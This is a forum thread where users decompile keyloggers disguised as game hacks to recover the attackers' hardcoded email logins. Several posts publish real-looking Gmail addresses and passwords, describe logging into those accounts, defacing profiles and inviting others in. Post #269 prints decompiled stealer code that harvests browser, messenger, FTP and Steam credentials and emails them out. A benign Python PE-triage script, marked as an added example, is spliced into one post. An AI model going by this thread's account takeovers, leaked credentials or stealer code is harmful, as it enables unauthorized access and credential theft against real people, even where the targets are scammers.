1. Post #241
    Gold Member
    ShaunOfTheLive
    November 2007
    9,903 Posts
    Ahh, okay, I always changed to dll because it was still a binary format that .net used, I may just change to some random extension from now on then.
    Just remove the extension altogether. Then you can pretend you're on Linux.

  2. Post #242
    ..............
    nekosune
    February 2009
    1,827 Posts
    Just remove the extension altogether. Then you can pretend you're on Linux.
    That tends to get annoying when Windows constantly asks what you want to open it with, I am going to make an extension like .refl and tell it to open any files with that in Reflector.

  3. Post #243
    Gold Member
    Darwin226
    January 2009
    4,158 Posts
    That tends to get annoying when Windows constantly asks what you want to open it with, I am going to make an extension like .refl and tell it to open any files with that in Reflector.
    What was wrong with renaming it to dll?

  4. Post #244
    ..............
    nekosune
    February 2009
    1,827 Posts
    What was wrong with renaming it to dll?
    I just realised that if I rename it .refl, and reassociate, it means I can start Reflector on the right project in one go, rather than loading it separately, just a minor 1 minute timesaver.

  5. Post #245
    newbs
    December 2007
    634 Posts
    Sorry to bump an old thread, but I just found this.

    One of the guys stored his creds in plaintext. The other guy used an obfuscator which made it a bit harder but I figured it out. ;)

    I shut down both of their accounts.

    I used ILSpy for my de-compiler and de4dot for my de-obfuscator.

    This was really fun to do and I learned a bit along the way.

    Here's a link to the files if anyone's interested:
    http://www.sendspace.com/file/deasxe

    RSMemershipGenerator
    Username: [spoiler]Bapsigste@gmail.com[/spoiler]
    Password: [spoiler]hallo1233[/spoiler]

    Runescape membership hack v12.3
    Username: [spoiler]stuurhaan01@gmail.com[/spoiler]
    Password: [spoiler]tjoban123[/spoiler]

    As far as I could tell there is no backdoor. It's just a phishing scam.

  6. Post #246
    Voted WORST Gold Member 2012
    Killuah
    August 2005
    15,760 Posts
    Ok hi.

    I was linked here by a news thread and thought I'd give it a try.

    So I tried to get something from
    https://www.youtube.com/watch?v=w1dp9RoXhnU

    Lucky me, it triggers MSE and apparently it contains some sort of backdoor thingie?

    Just where do you guys find this stuff and how do you check if it's a VP project?

  7. Post #247
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Ok hi.

    I was linked here by a news thread and thought I'd give it a try.

    So I tried to get something from
    https://www.youtube.com/watch?v=w1dp9RoXhnU

    Lucky me, it triggers MSE and apparently it contains some sort of backdoor thingie?

    Just where do you guys find this stuff and how do you check if it's a VP project?
    Let's do a walkthrough.

    First, you'll need ILSpy. Open up the EXE with that. In the case of this EXE, you'll get the error "This file does not contain a managed assembly." This means that the file is not a .NET application.

    The next step, for this program, is to open it up in 7zip. Sometimes this'll work. In this case, you'll see this:


    This means that the executable is packed with UPX. You can also check this with something like PEiD.

    Chances are, the EXE was packed with an older version of UPX. This means it's harder to uncompress, since the built-in UPX decompressor won't do it. That means we'll have to use OllyDbg to uncompress this file. It's a little complex, but you should be able to figure it out with this tutorial: http://securityxploded.com/unpackingupx.php

    After you've done that, try opening up the unpacked EXE in ILSpy. It still doesn't work! Why? If you open up the EXE in Notepad++, you'll notice two things:


    The first one, that I've circled, is the MZ header. All EXE files begin with MZ. This tells us that we have, in fact, unpacked this correctly. The second thing you'll notice is the TObject and other underlined names. TObject is an object in Delphi. This means two things: that we can't decompile this, and it's probably a RAT.

    But that's no fair; we didn't get to see how you unpack .NET keyloggers. Let's take a look at one I have in my folder (I keep a folder of all the keyloggers I download). If you open this one up (I won't share the file, it's still malicious), you'd notice that it did, in fact, open up in ILSpy:


    Alright, now we need to go to the Form1 class. You'll want to look around the button click events until you find one that looks like this:


    Congrats, you've just whaled a keylogger! Unfortunately, that was a really boring one. Let's try a harder one.

    If you were to open this one up, you'd notice this:


    C# and VB support putting tons of weird characters into class names. This makes obfuscation a lot easier. Let's go to Module1.


    Now, this is a Project Neptune keylogger (as you can see on the bottom). It supports FTP and email, but no one uses FTP. Two of those variables under "smtp.gmail.com" are the email and password. They're encrypted though. Let's open up this exe in Visual Studio (you can export a project with ILSpy under the File menu).

    The most useful tools you'll use in Visual Studio for this type of thing are Find All References and Go to Definition. This pretty much negates obfuscation. If you go to the "smtp.gmail.com" variable, right click, and find all references, you'll see that it goes into a SendEmail function.


    Thanks to IntelliSense, we can find out what variables are the username and password - in this case, Module1.μνΩΟηχΩωγ and Module1.ΧΦΦικΗΥκβ. However, at some point along the line, these variables must've been decrypted. Let's find all references again.


    Here we can see that the username and password are being assigned to - by a decryption function. We can also see that the key is the last parameter. With this info, we can put the decryption function in another project and run it to decrypt the email and password.


    Now, we run this, and check the contents of out.txt. In this case, the contents are:
    Code:
    User: metriek1@gmail.com - Pass: keylogger1
    So, you log into that account, and do what you want. You'll want to change the recovery email and the password, which both stops the "hacker" from logging in and stops keylogger logs from being sent. You can also spice up their Google+ profile:



    (That's not the original picture of the "hacker", it's an inside joke)
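As an added example (not from this thread or any of its posters), here is a small Python triage script that performs the first checks of the walkthrough above statically, without ever running the sample: the MZ/PE signature, UPX section names (what 7zip and PEiD reveal), whether the file carries a CLR header (what ILSpy needs to open it), and a scan for the strings the post calls out (TObject, smtp.gmail.com, Project Neptune). The build_sample helper constructs a minimal fake PE image so the script runs offline; its CLR RVA/size values are placeholders.

```python
import struct
import sys

# Strings the walkthrough treats as tells, checked in ASCII and in UTF-16LE
# (the encoding .NET uses for string literals in the #US heap).
INDICATORS = ["TObject", "smtp.gmail.com", "Project Neptune"]


def find_indicators(data: bytes) -> list:
    """Return the indicator strings present in data, in either encoding."""
    return [s for s in INDICATORS
            if s.encode("ascii") in data or s.encode("utf-16-le") in data]


def triage(data: bytes) -> dict:
    """Static, read-only checks on a PE image; the sample is never executed."""
    r = {"is_pe": False, "managed": False, "packed_upx": False,
         "sections": [], "indicators": find_indicators(data)}
    # Every Windows executable starts with "MZ"; e_lfanew at 0x3C locates "PE\0\0".
    if len(data) < 0x40 or data[:2] != b"MZ":
        return r
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return r
    r["is_pe"] = True
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # PE32 keeps NumberOfRvaAndSizes at +92 and the directories at +96; PE32+ at +108/+112.
    n_dirs_off, dirs_off = (92, 96) if magic == 0x10B else (108, 112)
    n_dirs = struct.unpack_from("<I", data, opt + n_dirs_off)[0]
    if n_dirs > 14:
        # Directory 14 is the CLR header. Non-zero means a managed assembly, which is
        # what ILSpy needs; a UPX-packed or native (C++/Delphi) file shows zeros here.
        clr_rva, clr_size = struct.unpack_from("<II", data, opt + dirs_off + 14 * 8)
        r["managed"] = clr_rva != 0 and clr_size != 0
    sec = opt + opt_size
    for i in range(n_sections):
        raw = data[sec + i * 40: sec + i * 40 + 8]
        r["sections"].append(raw.rstrip(b"\0").decode("ascii", "replace"))
    # UPX renames the sections to UPX0/UPX1/UPX2, the same thing 7zip and PEiD show.
    r["packed_upx"] = any(n.lstrip(".").startswith("UPX") for n in r["sections"])
    return r


def build_sample(managed: bool, upx: bool, payload: bytes) -> bytes:
    """Construct a minimal PE32 image for testing. It is not a runnable program."""
    sections = [b"UPX0", b"UPX1", b".rsrc"] if upx else [b".text", b".rsrc"]
    opt_size = 224  # PE32 optional header including all 16 data directories
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)     # placeholder CLR RVA/size
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"),
                                0, 0, 0, 0, 0, 0, 0, 0, 0x60000020)
                    for n in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs + payload


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    sample = open(path, "rb").read() if path else build_sample(True, False, b"TObject")
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

A managed result with no UPX sections is the case where ILSpy opens the file directly; a packed or unmanaged result is the case where the walkthrough turns to OllyDbg or Notepad++ instead.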

  8. Post #248
    Jaykin Bacon: Episode 3
    SteveUK
    May 2005
    2,469 Posts
    BBC News had an article about this sort of thing today: http://www.bbc.co.uk/news/technology-21371609

    Most of these seem to be using the same trick in that it just sends data to an email address which is hardcoded.

  9. Post #249
    Gold Member
    Lone Wolf807
    July 2007
    3,245 Posts
    What of something like this?



    So while I was attempting to unpack a UPX, my Mbam quarantined a file. I thought only using a .exe opens up files?

  10. Post #250
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    What of something like this?



    So while I was attempting to unpack a UPX, my Mbam quarantined a file. I thought only using a .exe opens up files?
    It's realizing that the file you're trying to read is a virus. It doesn't mean it will execute it.

    And for something like that, that means that it's a regular compiled file (C++, Delphi, Assembly, etc.)

  11. Post #251
    King of the Oil Refinery
    Tobba
    December 2008
    6,229 Posts
    Trying to figure out Project Neptune

    The credentials are base64 encoded, but they're not decoded anywhere, and decoded it's gibberish
    I'm guessing NetworkCredentials decodes them somehow but I have no idea how

  12. Post #252
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Trying to figure out Project Neptune

    The credentials are base64 encoded, but they're not decoded anywhere, and decoded it's gibberish
    I'm guessing NetworkCredentials decodes them somehow but I have no idea how
    They're decoded like this:

  13. Post #253
    HeatPipe
    October 2007
    1,574 Posts
    Triple encrypted?

  14. Post #254
    Kamshak
    July 2008
    438 Posts
    snip missed 5 pages

  15. Post #255
    Gold Member
    Neo Kabuto
    November 2008
    5,641 Posts
    Triple encrypted?
    It's an attempt to make it more annoying to get around, but it's still really easy.

  16. Post #256
    Gold Member
    TheCreeper
    April 2012
    703 Posts
    Now, we run this, and check the contents of out.txt. In this case, the contents are:
    Code:
    User: metriek1@gmail.com - Pass: keylogger1
    So, you log into that account, and do what you want. You'll want to change the recovery email and the password, which both stops the "hacker" from logging in and stops keylogger logs from being sent. You can also spice up their Google+ profile:



    (That's not the original picture of the "hacker", it's an inside joke)
    I've decompiled and decrypted the same keylogger as you and only later did I realise that the username & password are in your post.


  17. Post #257
    Gold Member
    Neo Kabuto
    November 2008
    5,641 Posts
    I've decompiled and decrypted the same keylogger as you and only later did I realise that the username & password is in your post.
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.

  18. Post #258

    January 2012
    421 Posts
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.
    Doesn't look like he's logged in, so the password would be different, but the email remains.

  19. Post #259
    Gold Member
    Neo Kabuto
    November 2008
    5,641 Posts
    Doesn't look like he's logged in, so the password would be different, but the email remains.
    Looks like he's logged in to me. He has options to fill out the profile and post statuses/updates/whatever G+ calls them as that guy.

  20. Post #260
    PENISCORP DIRECTOR
    Gran PC
    August 2007
    3,114 Posts
    I talked to some lovely guy on that account before

  21. Post #261
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.
    I forgot to change the password

  22. Post #262
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts


    ugggggh, several hours of work to be met by this. Beaten to the punch.

    Edited:



    It was still an interesting and fun challenge, hopefully I'll find time to do a writeup.

  23. Post #263
    Gold Member
    Neo Kabuto
    November 2008
    5,641 Posts


    ugggggh, several hours of work to be met by this. Beaten to the punch.
    I know that feeling. Still, at least you know it's down?

  24. Post #264
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts
    It was still an interesting and fun challenge, hopefully I'll find time to do a writeup.
    The first part of that is out now

  25. Post #265
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts

  26. Post #266
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    I think it's time to introduce a very useful application, Simple Assembly Explorer.

    SAE is a bunch of useful programs wrapped into one. Its most useful function is the class editor, which allows you to edit programs without converting them back into C# or VB. Let's open up another old keylogger:


    As you can easily see in this image, this assembly is packing some encrypted data. We could save this and rip the decryption function out to get the decrypted data, but that's no fun. Let's do the fun way.

    This assembly is obfuscated with a bunch of awful variable and function names:


    Let's use the deobfuscator function of SAE to make this easier to read. Open up SAE, right click on the EXE, and choose "Deobfuscator":


    You don't need to worry about any of this. Once it's done, you can see the difference.


    It's not great, but this can be very useful, especially with unprintable or Chinese characters for names.

    You don't need to use ILSpy from this point on; SAE has the ability to view the assembly in C# (using ILSpy, actually). In the Main function of this assembly, it calls a few functions:


    As far as I can tell, the line c000003.m000004("217") is the one that runs the application, using the data decrypted from the line before it. Let's check out m000004.


    To extract the application, we'll need to edit the IL code directly. Switch over to the details tab, where you'll see something like this:


    This is the code that C# and VB compile into. It's very different, but you can either Google for tutorials or pick it up as you go. As far as this tutorial goes, we won't need to know much. First, we'll need to remove the current functions that are called. Remove everything from line 4 to 12.

    Right now, what this code does is check if argument one of the function (ldarg.0) and string.Empty (ldsfld) are equal (call op_Inequality). If they aren't (brfalse.s), the code will continue, else it will jump to whatever brfalse.s is set to (the ret statement). Right click on brfalse.s and click "insert after".


    In the opcode box, type "call". In the operand box, click the browse button (...). Click open in the top left, click "Open GAC", and open the "mscorlib" namespace. Open up the "System.IO" namespace under System, then the File class under that, then finally on the WriteAllBytes function. Click Select (top left).

    We'll need two arguments for WriteAllBytes - the file name and the byte array. The ldstr opcode takes care of one of them - insert that now - and the other can be loaded with ldsfld. Insert that too - with the f00000a variable. Your IL should look something like this now:


    Finally, save the assembly. Open it again and check the function out in ILSpy to make sure it's going to work.


    Finally, run the edited exe. You may be wondering "Why would I ever run a virus?", but we have, in theory, removed the virus part of the application. Obviously, you should be as careful as possible. When you run it, you should get the file output back. If you open it in ILSpy, you'll see this:


    And here we go again...

  27. Post #267
    SirCrest is my life, so is yours.
    Goz3rr
    October 2009
    7,456 Posts
    Man, all the ones I managed to decrypt had their password changed less than a week ago :c

    Edited:

    Is there an easy way to extract the .NET installer things, because I don't feel like installing it to get the executable.

  28. Post #268
    aurum481
    November 2008
    2,519 Posts
    That was an interesting read. Will you put up other parts?

  29. Post #269
    Pery
    October 2008
    446 Posts
    I've found a quite nasty one. Steals your MSN, Chrome, Firefox, IE, FileZilla, imvu, no-ip, Pidgin and Steam and Windows key. Still cracking through this one but I've found out it's called iRtehStealer.

    Here's a snippet:
    Code:
    // Builds the "STEAL" report mail and sends it over SMTP; string_8 is used as
    // sender, recipient and login name, string_9 as the password, string_10/11 as host and port.
    public object method_42(string string_8, string string_9, string string_10, string string_11)
    {
        object obj = null;
        try
        {
            MailMessage mailMessage = new MailMessage();
            mailMessage.From = new MailAddress(string_8);
            mailMessage.To.Add(string_8);
            mailMessage.Subject = string.Concat("iRtehStealer:STEAL:", Class9.smethod_0().Name);
            mailMessage.Body = this.vmethod_24().Text;
            SmtpClient smtpClient = new SmtpClient(string_10);
            smtpClient.Port = Conversions.ToInteger(string_11);
            smtpClient.Credentials = new NetworkCredential(string_8, string_9);
            smtpClient.EnableSsl = true;
            smtpClient.Send(mailMessage);
        }
        catch (Exception exception1)
        {
            // VB.NET error-handling scaffolding emitted by the compiler; failures are swallowed.
            Exception exception = exception1;
            ProjectData.SetProjectError(exception);
            ProjectData.ClearProjectError();
        }
        return obj;
    }
    And another:
    Code:
    // Assembles the report body; each vmethod_N().Text holds one stealer module's output,
    // and %tmp%\TMP.dat is appended as a "CD-Key Steal" section if present.
    public void method_41()
    {
        string[] text = new string[21];
        text[0] = "=========PC Information=========\r\n";
        text[1] = this.vmethod_10().Text;
        text[2] = "\r\n\r\n=========MSN Steal=========\r\n";
        text[3] = this.vmethod_6().Text;
        text[4] = "\r\n=========Chrome Steal=========\r\n";
        text[5] = this.vmethod_2().Text;
        text[6] = "\r\n=========Firefox Steal=========\r\n";
        text[7] = this.vmethod_0().Text;
        text[8] = "\r\n=========Internet Explorer Steal=========\r\n";
        text[9] = this.vmethod_4().Text;
        text[10] = "\r\n=========FileZilla Steal=========\r\n";
        text[11] = this.vmethod_8().Text;
        text[12] = "\r\n\r\n=========IMVU Steal=========\r\n";
        text[13] = this.vmethod_12().Text;
        text[14] = "\r\n\r\n=========No-IP Steal=========\r\n";
        text[15] = this.vmethod_14().Text;
        text[16] = "\r\n\r\n=========Pidgin Steal=========\r\n";
        text[17] = this.vmethod_18().Text;
        text[18] = "\r\n\r\n=========Windows Key=========\r\n";
        text[19] = this.vmethod_16().Text;
        text[20] = "\r\n\r\n";
        this.vmethod_24().Text = string.Concat(text);
        string str = string.Concat(Interaction.Environ("tmp"), "\\TMP.dat");
        if (File.Exists(str))
        {
            try
            {
                StreamReader streamReader = new StreamReader(str);
                string end = streamReader.ReadToEnd();
                this.vmethod_50().Text = end;
                this.vmethod_24().Text = string.Concat(this.vmethod_24().Text, "=========CD-Key Steal=========\r\n", this.vmethod_50().Text);
            }
            catch (Exception exception)
            {
                ProjectData.SetProjectError(exception);
                ProjectData.ClearProjectError();
            }
        }
    }

  30. Post #270
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Is there an easy way to extract the .NET installer things, because i don't feel like installing it to get the executable.
    Things like Setup.exe? I'll look into it. I've seen tons of those but I've never checked them out.

    Edited:

    By the way, quick way to whale unknown loggers.

    If you see something like this:


    It's an unknown logger. Don't bother digging through the code to find the password, because it's not in there. Open the file up in Notepad++ (Notepad won't cut it, Sublime Text 2 renders it as hex), and search for "Unknown Logger". You'll find this:


    First is the email, second is the password. It seems someone likes Breaking Bad:

  31. Post #271
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts
    That was an interesting read. Will you put up other parts?
    Eventually, I still need to write them :v

    I'll try to find some time tonight as I have off from school.

  32. Post #272
    I made WAYWO a better place
    OldFusion
    September 2011
    1,311 Posts
    Man, all the ones I managed to decrypt had their password changed less than a week ago :c

    Edited:

    Is there an easy way to extract the .NET installer things, because I don't feel like installing it to get the executable.
    http://en.wikipedia.org/wiki/Cabinet_(file_format)

    7zip unpacks them just fine.

  33. Post #273
    SirCrest is my life, so is yours.
    Goz3rr
    October 2009
    7,456 Posts
    Pretty sure I tried that, it said it was an unsupported file type, do you need to rename it to .cab for it to work?

  34. Post #274
    helifreak
    May 2011
    653 Posts
    But they aren't cab files, even the cabinet SDK extract.exe can't open them.

  35. Post #275
    Se1f_Distruct
    April 2011
    633 Posts
    If you know for a fact that the keylogger sends an initial 'infected' email back home and runs on the .NET framework, you can simply get the password by running it sandboxed and logging the API calls with a profiler.

    Look for a NetworkCredentials constructor. It's always fucking there.

  36. Post #276

    February 2014
    1 Posts
    What of something like this?



    So while I was attempting to unpack a UPX, my Mbam quarantined a file. I thought only using a .exe opens up files?

    Hi
    This is not related to a keylogger but to decompiling a freeware (which is not an assembly).
    So I viewed the package with 7zip. I got the same first 4 files in the image.
    How to proceed from there?

    I tried in SAE, but it is not an assembly.
    NP++ gives MZ header.

    The freeware is: myquotes.exe found here - www.volumedigger.com/Software/myQuotes.aspx.
    The issue that I'm trying to correct is that it doesn't log on to the Yahoo server. Says "Failed to login to yahoo." with admin settings in Win 7.

    It says it's built on .NET Framework and I think Visual C++. I don't have much idea of coding, so it's just a guess.
    Looking at the images in the post, I thought it might be easier to fix in VS 2012. So I am just taking a shot..

    Any help, guidance is much appreciated.

  37. Post #277
    Tamschi
    December 2009
    3,615 Posts
    Hi
    This is not related to a keylogger but to decompiling a freeware (which is not an assembly).
    So I viewed the package with 7zip. I got the same first 4 files in the image.
    How to proceed from there?

    I tried in SAE, but it is not an assembly.
    NP++ gives MZ header.

    The freeware is: myquotes.exe found here - www.volumedigger.com/Software/myQuotes.aspx.
    The issue that I'm trying to correct is that it doesn't log on to the Yahoo server. Says "Failed to login to yahoo." with admin settings in Win 7.

    It says it's built on .NET Framework and I think Visual C++. I don't have much idea of coding, so it's just a guess.
    Looking at the images in the post, I thought it might be easier to fix in VS 2012. So I am just taking a shot..

    Any help, guidance is much appreciated.
    If you get those files it means it's a native executable, i.e. you can't really decompile it.

    You might be able to debug it though, but you will never get a reasonable source code in less time than it would take you to copy the whole thing from scratch.

    (Hint: Sniff the network connections, that will tell you how to request the data from Yahoo at least.
    If it's encrypted/TLS you need to use an active proxy though.)

  38. Post #278
    Gold Member
    Ott
    June 2012
    2,538 Posts
    Changed his profile picture to goatse



    Changed his password, here's the new credentials if you want to have some fun.

    Code:
    -snip-

  39. Post #279
    I'm a tool
    KillerLUA
    June 2009
    1,405 Posts
    Why don't these people just use a throwaway web server for storing keys? Is it the "recommended" thing in tutorials to use email?

    Doesn't seem to make any sense to me, and what use is collecting runescape/etc accounts anyways, how can you make money from that?

  40. Post #280
    Jaykin Bacon: Episode 3
    SteveUK
    May 2005
    2,469 Posts
    Why don't these people just use a throwaway web server for storing keys? Is it the "recommended" thing in tutorials to use email?

    Doesn't seem to make any sense to me, and what use is collecting runescape/etc accounts anyways, how can you make money from that?
    These are made by kids who literally copy and paste code from tutorials. Do you really expect them to be doing anything more advanced than that?